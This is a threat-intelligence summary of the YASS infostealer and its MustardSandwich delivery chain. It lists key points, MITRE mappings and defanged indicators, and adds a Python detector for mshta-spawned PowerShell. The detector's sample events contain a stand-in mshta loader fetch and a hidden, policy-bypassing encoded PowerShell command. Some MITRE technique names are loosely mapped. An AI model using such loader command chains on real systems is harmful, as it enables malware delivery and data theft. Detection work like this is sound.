Intezer’s investigation uncovers a new infostealer variant named Yet Another Silly Stealer (YASS), which shares traits with CryptBot but differs significantly in code and behavior. The write-up details the delivery chain via the MustardSandwich downloader, a multi-stage execution flow, encrypted C2 communications, and the optional deployment of the NetSupport Client as a backdoor.
Keypoints
- Intezer identifies a new infostealer variant named Yet Another Silly Stealer (YASS).
- YASS is delivered via a multi-stage downloader called MustardSandwich.
- The downloader uses a Windows shell link (LNK) file to trigger PowerShell execution via mshta.
- YASS employs obfuscation and anti-analysis techniques and targets data from browsers and wallets.
- Communications with the C2 server are conducted over encrypted HTTP POST requests.
- YASS can deploy the NetSupport Client as a backdoor on infected hosts.
- Despite similarities to CryptBot, YASS has notable implementation differences and is documented as a distinct variant.
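The keypoints describe an LNK file that launches mshta, which in turn starts PowerShell. The following added example (not Intezer's code) flags that parent/child chain in constructed process-creation events; the event field names, sample paths and the placeholder URL are assumptions, not values from the report.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style; field names assumed).
# Events 100-300 model the chain from the report: explorer.exe opens the LNK,
# mshta.exe fetches remote content, and PowerShell is spawned hidden with an
# encoded command. Events 400-500 are benign noise (an admin running PowerShell).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://cdn.example.invalid/loader"},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -enc QQBCAEMA"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 500, "ppid": 400,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-Service"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Launch options that raise suspicion when PowerShell is started by mshta.
SUSPICIOUS_OPTS = {
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "policy-bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.IGNORECASE),
    "encoded-command": re.compile(r"-enc(?:odedcommand)?\s+[A-Za-z0-9+/=]+", re.IGNORECASE),
}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_mshta_powershell_chains(events):
    """Return one finding per PowerShell process whose parent is mshta.exe
    launched with a remote URL; each finding lists the matched launch options."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in POWERSHELL:
            continue
        parent = by_pid.get(e["ppid"])
        if not parent or basename(parent["image"]) != "mshta.exe":
            continue
        if not REMOTE_URL.search(parent["cmd"]):
            continue
        opts = sorted(name for name, rx in SUSPICIOUS_OPTS.items() if rx.search(e["cmd"]))
        findings.append({"mshta_pid": parent["pid"], "powershell_pid": e["pid"],
                         "mshta_cmd": parent["cmd"], "options": opts})
    return findings
```

The benign cmd.exe → powershell.exe pair is not reported, so the rule keys on the mshta parent plus a remote argument rather than on PowerShell alone.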
MITRE Techniques
- [T1203] Exploitation for Client Execution – Used to execute malicious code within the MustardSandwich delivery chain.
- [T1059] PowerShell – PowerShell scripts are used in the downloader to maintain persistence on the infected machine.
- [T1003] Credential Access – Stealing credentials from browsers and applications.
- [T1041] Exfiltration – Exfiltration of sensitive data via HTTP POST requests.
- [T1071] Web Protocols – Communication with the C2 server over HTTP.
Indicators of Compromise
- [Hash] LNK file – e3bf61f6f96d1a121a1f7f47188cd36fc51f4565ca8cd8fc07207e56a038e7ca
- [Hash] HTA (EXE) – fd7654c5bb79652bc0db2696da35497b9aff2c783ec4c83705d33d329dc742d8
- [Hash] ZIP – b2080e7705283fce7e03c8895977c5e8c451b5f8a6eb3faecb8acb986a1587c6
- [Hash] IDATLOADER – 4810333bf96fb808604f3657118c734c3dd8ee4baa3e6ffe8da548ae0c8e15d3
- [Hash] YASS (Stealer) – 7ac46eb84f4b6d25601f23d2c30b7e80b6f3b2d82d3240234fc50af75290a29f
- [URL] Hosting Server – https://nextomax.b-cdn[.]net/nexto
- [URL] Hosting ZIP – https://nextomax.b-cdn[.]net/L2.zip
- [URL] Pinged by PowerShell Script – https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
- [Domain] NetSupport Hosting – brewdogebar[.]com
- [Domain] Additional Domains – enotik5050[.]com, barsuk5050[.]com
- [IP] C2/IP – 94.232.244[.]133
Read more: https://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/